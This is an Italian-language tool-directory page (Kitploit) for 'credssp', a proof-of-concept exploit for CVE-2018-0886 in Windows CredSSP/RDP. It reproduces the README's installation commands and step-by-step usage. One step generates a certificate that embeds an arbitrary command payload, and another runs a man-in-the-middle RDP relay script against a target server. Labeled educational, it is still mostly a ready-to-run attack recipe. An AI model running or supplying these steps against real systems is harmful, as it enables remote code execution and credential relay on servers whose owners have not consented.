Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
credssp — Un codice che dimostra CVE-2018-0886 | Kitploit
Strumenti/GitHubGitHub/preempt/credssp
Analisi delle VulnerabilitàExploitMovimento LateralePenetration TestingApprendimento e FormazioneRed Teaming
GitHubpreempt/credssp

credssp

Un codice che dimostra CVE-2018-0886

Vedi Repository
26757146 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

credssp

Questo è un codice PoC per sfruttare la CVE-2018-0886. Dovrebbe essere usato solo per scopi educativi. Si basa su un fork del progetto rdpy (https://github.com/preempt/rdpy), consentendo anche il relay credssp.

Scritto da Eyal Karni, Preempt [email protected]

Compilazione

Istruzioni (Linux)

Se stai usando Ubuntu 14, controlla il file di installazione. È stato testato su Ubuntu 16.04.

$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • Presuppone uno stato iniziale abbastanza pulito. È meglio disinstallare prima i componenti rilevanti come cryptography, pyopenssl, magari (pip uninstall cryptography).
  • È necessario installare una versione diversa di openssl affinché questo funzioni correttamente. Lo script di installazione lo fa.
  • Si prega di seguire le istruzioni nell'ordine descritto.

Esecuzione dell'exploit

Esporta un certificato adatto per Server Authentication da qualsiasi dominio. (È usato per RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

Per generare un certificato che sfrutta la vulnerabilità (contiene il payload), usa:

$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 

(ExportedCert è il certificato esportato dal passaggio 1. exploitc.pem, exploitk.pem sono rispettivamente il certificato generato e la chiave privata)

Per eseguire lo script di attacco:

$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

Maggiori dettagli sono nella sezione usage degli script (--help).

Scarica lo strumento